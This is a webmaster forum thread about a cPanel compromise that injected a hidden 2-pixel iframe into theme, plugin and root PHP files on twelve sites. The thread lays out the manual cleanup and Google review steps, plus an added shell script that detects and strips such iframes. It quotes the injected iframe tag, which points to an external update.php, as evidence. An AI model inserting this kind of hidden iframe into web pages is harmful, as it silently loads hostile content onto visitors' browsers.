Warning People for Cpanel Users MALWARE

katika

I am really pissed now. Google sent me a notice that my main site is flagged because there is malware.

I am in the middle of a promotion, agghhhh.

So motherfuckers injected an iframe into my head section, randomly, in plugins, theme...

Here is code:

Code:
<iframe src="http://www.phrae.tv/images/update.php" width="2" height="2" frameborder="0"></iframe>

A few weeks ago I received an email from one of the BH forums, I do not remember which one, to buy some crazy tool for code injection; the deal was about 100 USD.

Now every fool and his brother can hack cPanel for a small price, without knowing code.

I have customer sites on that cPanel. And every one is infected with this iframe.

And cPanel does not have a multiple find-and-replace tool.

So I must download every backup, do the cleaning and upload the files. And be at Big G's mercy to remove the flag from search results...

Don't know what to say. Any suggestions? Tips? Words to calm me down? :(


katika
 

njohnson3163

Thanks for warning me about that! I'm actually going to look into how to secure myself from that now.
 

katika

Here is an update.

Big G removed the warning 6-12 hours after I hit the review button in the webmaster tool.

Once again: I got the email from Big G because I had an inactive AdWords ad. So if I had not had the site in AdWords, this site and the others on the same cPanel would still be infected with this 2px iframe.

Other cPanels from my WHM were not infected.

All 12 of my domains on that cPanel account were infected: PHP files (WordPress or other) which had something to do with the head section of the site, mostly header.php in the theme folder, some plugin files... others in the main WP folder and some root files too, about 50-60 files per site.

I have a lot of plugins and every site is 40-70 megs.

Here are the steps for cleaning the malware:

1. I compressed the files into a zip in cPanel
2. Downloaded them, one by one
3. Unpacked them
4. Multiple find-and-replace to remove the iframe code.
5. Zipped them and uploaded to the server.
6. Opened every domain in a browser to check that I did a good job
7. Submitted the form to Big G to ask for a review


Step 5 was time-consuming: infected files are in all folders, and I do not have unlimited upload speed, so I split the files to get zips of 5-20 MB per site.

It took me about 3 hours to do that.

Google removed the Red Window Warning in 15 minutes.

I was tired (3rd hour after midnight); this saga lasted about 6-7 hours: from the email from Big G and my stress... browsing to find out about the problem, coffee breaks, tactics...

When I woke up, the warning blue line in the search engine results was gone :)

I hope you will never have this kind of problem, but here is my story and the steps to solve the problem.

The worst thing: my VPS support failed me, they never answered my tickets.

Maybe they could have sped up the task by doing the multiple find-and-replace on the server, but I do not know if Linux has this option as Win does.

regards
katika
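
On the question above of whether Linux can do the multi-file find and replace on the server: it can, and the following is an added example, not part of the original posts. It assumes shell access with GNU grep and sed, and the function names, file extensions and the width-before-height attribute order (as in the tag quoted in the first post) are assumptions.

```shell
#!/bin/sh
# Added example: find and strip hidden (0-2 px) iframes under a web root.
# Assumption: width precedes height, as in the injected tag quoted in the thread.
# A normal embed such as width="560" height="315" does not match.
PATTERN='<iframe[^>]*width="[0-2]"[^>]*height="[0-2]"[^>]*>[[:space:]]*</iframe>'

# find_injected DIR: list files that contain a matching iframe (read-only).
find_injected() {
    grep -rlE --include='*.php' --include='*.html' --include='*.htm' \
        --include='*.js' -e "$PATTERN" "$1" 2>/dev/null | sort
}

# clean_injected DIR BACKUP_DIR: copy each infected file to BACKUP_DIR
# (kept outside the web root, original path preserved), then delete the
# iframe in place. Prints the number of files cleaned.
clean_injected() {
    cleaned=0
    while IFS= read -r file; do
        [ -n "$file" ] || continue          # empty list yields one blank line
        mkdir -p "$2/$(dirname "$file")"
        cp -p "$file" "$2/$file"            # evidence copy for later review
        sed -E -i.tmp "s#${PATTERN}##g" "$file" && rm -f "$file.tmp"
        cleaned=$((cleaned + 1))
    done <<EOF
$(find_injected "$1")
EOF
    echo "$cleaned"
}

# Typical use (paths are placeholders):
#   find_injected /home/USER/public_html            # review the list first
#   clean_injected /home/USER/public_html /home/USER/iframe-backup
```

This removes only the injected tag. Whatever allowed the files to be modified is still there until it is found and closed.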
 

iulianh

I think unmanaged linux VPS without CPanel is safer now :) Thanks for the heads up
 

SmartMan

Did you use any nulled themes/plugins on any of your sites? Also which hosting do you use?
 